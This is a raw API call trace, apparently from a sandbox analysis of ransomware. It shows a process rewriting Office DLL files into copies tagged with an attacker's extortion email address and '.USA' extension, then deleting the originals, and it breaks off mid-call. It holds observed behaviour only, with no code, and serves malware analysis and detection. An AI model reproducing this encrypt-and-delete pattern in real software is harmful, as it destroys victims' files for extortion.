[0059.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.984] lstrlenW (lpString=".1cd") returned 4 [0059.984] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0059.984] lstrlenW (lpString=".jpg") returned 4 [0059.984] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.985] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.985] lstrlenW (lpString="ACEODTXT.DLL") returned 12 [0059.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0059.985] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=15800) returned 1 [0059.985] CloseHandle (hObject=0x210) returned 1 [0059.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 0x20 [0059.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0059.985] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.985] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0059.986] GetLastError () returned 0x0 [0059.986] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0059.987] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0059.989] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.989] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.989] SetEndOfFile (hFile=0x1c4) returned 1 [0059.989] CloseHandle (hObject=0x1c4) returned 1 [0059.989] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.989] SetEndOfFile (hFile=0x210) returned 1 [0059.990] CloseHandle (hObject=0x210) returned 1 [0059.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.990] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 1 [0059.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.990] lstrlenW (lpString=".doc") returned 4 [0059.990] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.990] lstrlenW (lpString=".docx") returned 5 [0059.990] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0059.990] lstrlenW (lpString=".pdf") returned 4 [0059.991] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".xls") returned 4 [0059.991] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".xlsx") returned 5 [0059.991] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0059.991] lstrlenW (lpString=".ppt") returned 4 [0059.991] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString=".zip") returned 4 [0059.991] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".rar") returned 4 [0059.991] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".bz2") returned 4 [0059.991] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.991] lstrlenW (lpString=".7z") returned 3 [0059.991] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString=".dbf") returned 4 [0059.991] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString=".1cd") returned 4 [0059.991] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString=".jpg") returned 4 [0059.991] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.991] lstrlenW (lpString=".doc") returned 4 [0059.991] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".docx") returned 5 [0059.991] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0059.991] lstrlenW (lpString=".pdf") returned 4 [0059.991] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".xls") returned 4 [0059.991] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.991] lstrlenW (lpString=".xlsx") returned 5 [0059.991] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0059.992] lstrlenW (lpString=".ppt") returned 4 [0059.992] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.992] lstrlenW (lpString=".zip") returned 4 [0059.992] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.992] lstrlenW (lpString=".rar") returned 4 [0059.992] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.992] lstrlenW (lpString=".bz2") returned 4 [0059.992] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.992] lstrlenW (lpString=".7z") returned 3 [0059.992] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.992] lstrlenW (lpString=".dbf") returned 4 [0059.992] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.992] lstrlenW (lpString=".1cd") returned 4 [0059.992] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0059.992] lstrlenW (lpString=".jpg") returned 4 [0059.992] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.992] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.992] lstrlenW (lpString="ACEOLEDB.DLL") returned 12 [0059.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0059.993] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=537504) returned 1 [0059.993] CloseHandle (hObject=0x1c4) returned 1 [0059.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 0x20 [0059.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0059.993] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.993] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.994] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0059.994] GetLastError () returned 0x0 [0059.994] ReadFile (in: hFile=0x1c4, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x833a0, lpOverlapped=0x0) returned 1 [0060.004] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x833b0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x833b0, lpOverlapped=0x0) returned 1 [0060.014] ReadFile (in: hFile=0x1c4, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.014] WriteFile (in: hFile=0x1f0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.014] SetEndOfFile (hFile=0x1f0) returned 1 [0060.014] CloseHandle (hObject=0x1f0) returned 1 [0060.014] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.014] SetEndOfFile (hFile=0x1c4) returned 1 [0060.019] CloseHandle (hObject=0x1c4) returned 1 [0060.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.019] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 1 [0060.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.019] lstrlenW (lpString=".doc") returned 4 [0060.019] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.019] lstrlenW (lpString=".docx") returned 5 [0060.019] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0060.019] lstrlenW (lpString=".pdf") returned 4 [0060.019] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.019] lstrlenW (lpString=".xls") returned 4 [0060.019] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.019] lstrlenW (lpString=".xlsx") returned 5 [0060.019] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0060.019] lstrlenW (lpString=".ppt") returned 4 [0060.019] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.019] lstrlenW (lpString=".zip") returned 4 [0060.020] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".rar") returned 4 [0060.020] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".bz2") returned 4 [0060.020] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.020] lstrlenW (lpString=".7z") returned 3 [0060.020] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString=".dbf") returned 4 [0060.020] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString=".1cd") returned 4 [0060.020] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString=".jpg") returned 4 [0060.020] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString=".doc") returned 4 [0060.020] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".docx") returned 5 [0060.020] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0060.020] lstrlenW (lpString=".pdf") returned 4 [0060.020] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".xls") returned 4 [0060.020] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".xlsx") returned 5 [0060.020] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0060.020] lstrlenW (lpString=".ppt") returned 4 [0060.020] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.020] lstrlenW (lpString=".zip") returned 4 [0060.020] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".rar") returned 4 [0060.020] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.020] lstrlenW (lpString=".bz2") returned 4 [0060.020] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.020] lstrlenW (lpString=".7z") returned 3 [0060.021] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.021] lstrlenW (lpString=".dbf") returned 4 [0060.021] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.021] lstrlenW (lpString=".1cd") returned 4 [0060.021] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0060.021] lstrlenW (lpString=".jpg") returned 4 [0060.021] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.021] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.021] lstrlenW (lpString="ACER3X.DLL") returned 10 [0060.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0060.021] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=451480) returned 1 [0060.021] CloseHandle (hObject=0x1c4) returned 1 [0060.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 0x20 [0060.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0060.022] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.022] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.886] GetLastError () returned 0x0 [0060.886] ReadFile (in: hFile=0x1c4, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x6e398, lpOverlapped=0x0) returned 1 [0060.895] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x6e3a0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x6e3a0, lpOverlapped=0x0) returned 1 [0060.902] ReadFile (in: hFile=0x1c4, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.902] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0060.902] SetEndOfFile (hFile=0x1a0) returned 1 [0060.902] CloseHandle (hObject=0x1a0) returned 1 [0060.902] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.902] SetEndOfFile (hFile=0x1c4) returned 1 [0060.906] CloseHandle (hObject=0x1c4) returned 1 [0060.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.906] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 1 [0060.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.906] lstrlenW (lpString=".doc") returned 4 [0060.906] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.906] lstrlenW (lpString=".docx") returned 5 [0060.906] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0060.907] lstrlenW (lpString=".pdf") returned 4 [0060.907] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString=".xls") returned 4 [0060.907] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString=".xlsx") returned 5 [0060.907] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0060.907] lstrlenW (lpString=".ppt") returned 4 [0060.907] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString=".zip") returned 4 [0060.907] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString=".rar") returned 4 [0060.907] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString=".bz2") returned 4 [0060.907] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.907] lstrlenW (lpString=".7z") returned 3 [0060.907] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString=".dbf") returned 4 [0060.907] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString=".1cd") returned 4 [0060.907] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString=".jpg") returned 4 [0060.907] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.907] lstrlenW (lpString=".doc") returned 4 [0060.907] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.907] lstrlenW (lpString=".docx") returned 5 [0060.907] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0060.907] lstrlenW (lpString=".pdf") returned 4 [0060.907] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.908] lstrlenW (lpString=".xls") returned 4 [0060.908] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.908] lstrlenW (lpString=".xlsx") returned 5 [0060.908] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0060.908] lstrlenW (lpString=".ppt") returned 4 [0060.908] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.908] lstrlenW (lpString=".zip") returned 4 [0060.908] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.908] lstrlenW (lpString=".rar") returned 4 [0060.908] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.908] lstrlenW (lpString=".bz2") returned 4 [0060.908] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.908] lstrlenW (lpString=".7z") returned 3 [0060.908] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.908] lstrlenW (lpString=".dbf") returned 4 [0060.908] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.908] lstrlenW (lpString=".1cd") returned 4 [0060.908] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0060.908] lstrlenW (lpString=".jpg") returned 4 [0060.908] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.908] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.908] lstrlenW 